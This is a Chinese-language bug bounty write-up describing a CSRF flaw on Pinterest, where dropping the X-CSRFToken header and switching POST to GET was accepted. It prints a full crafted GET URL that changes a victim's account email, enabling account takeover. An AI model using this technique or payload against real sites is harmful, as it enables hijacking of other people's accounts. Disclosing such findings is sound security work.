第十八篇:CSRF導致賬號接管
摘要:
哪裡有BUG??
當瀏覽”...
哪裡有BUG??
當瀏覽”https://www.pinterest.com"時,我發現CSRF tokens是通過http頭”X-CSRFToken”傳遞的,所以正常情況下要驗證CSRF token的話,請求如下所示:
POST /_ngjs/resource/UserSettingsResource/update/ HTTP/1.1 Host: www.pinterest.com Content-Type: application/x-www-form-urlencoded X-CSRFToken: <CSRF Token> …….. …….. <POST Parameters>
1)首先,我將POST請求中的”X-CSRFToken”頭刪掉,然後通過burpsuit轉發,伺服器響應error “/resource/UserSettingsResource/update/ didn’t finish after 8 seconds”,這意味著CSRF令牌正在進行驗證
2)然後,我將上面的POST請求更改為GET請求,同樣刪掉”X-CSRFToken”,轉發之後我得到響應”200 ok”
賬號接管
這是一個基於GET請求的CSRF,我們需要做的僅僅是製作一個URL連結,將所有通過POST傳遞的引數通過GET請求進行傳遞(不是所有程式都接受這種方法,大家可以通過burpsuit自帶的”change request method”來轉換)
https://www.pinterest.com/_ngjs/resource/UserSettingsResource/update/?source_url=%2Fsettings%2F&data=%7B%22options%22%3A%7B%22impressum_url%22%3Anull%2C%22last_name%22%3A%22dummy%22%2C%22custom_gender%22%3Anull%2C%22locale%22%3A%22en-US%22%2C%22has_password%22%3Atrue%2C%22email_settings%22%3A%22Everything+%28except+emails+you%27ve+turned+off%29%22%2C%22news_settings%22%3A%22Activity+from+other+people+on+Pinterest%22%2C%22id%22%3A%22%22%2C%22is_write_banned%22%3Afalse%2C%22first_name%22%3A%22dummyuser%22%2C%22push_settings%22%3A%22Everything+%28except+push+you%27ve+turned+off%29%22%2C%22personalize_from_offsite_browsing%22%3Atrue%2C%22facebook_timeline_enabled%22%3Afalse%2C%22email_changing_to%22%3Anull%2C%22personalize_nux_from_offsite_browsing%22%3Afalse%2C%22is_tastemaker%22%3Afalse%2C%22type%22%3A%22user_settings%22%2C%22email%22%3A%22anytestemail%40user.com%22%2C%22website_url%22%3A%22%22%2C%22location%22%3A%22%22%2C%22username%22%3A%22dummyuser%22%2C%22pfy_preference%22%3Atrue%2C%22facebook_publish_stream_enabled%22%3Afalse%2C%22email_bounced%22%3Afalse%2C%22is_partner%22%3Anull%2C%22ads_customize_from_conversion%22%3Atrue%2C%22additional_website_urls%22%3A%5B%5D%2C%22about%22%3A%22test%22%2C%22gender%22%3A%22male%22%2C%22age%22%3Anull%2C%22exclude_from_search%22%3Afalse%2C%22birthdate%22%3Anull%2C%22show_impressum%22%3Afalse%2C%22email_biz_settings%22%3A%22Everything+%28includes+announcements%2C+expert+tips%2C+creative+ideas%2C+and+more%29%22%2C%22country%22%3A%22IN%22%2C%22hide_from_news%22%3Afalse%2C%22collaborative_boards%22%3A%5B%5D%7D%2C%22context%22%3A%7B%7D%7D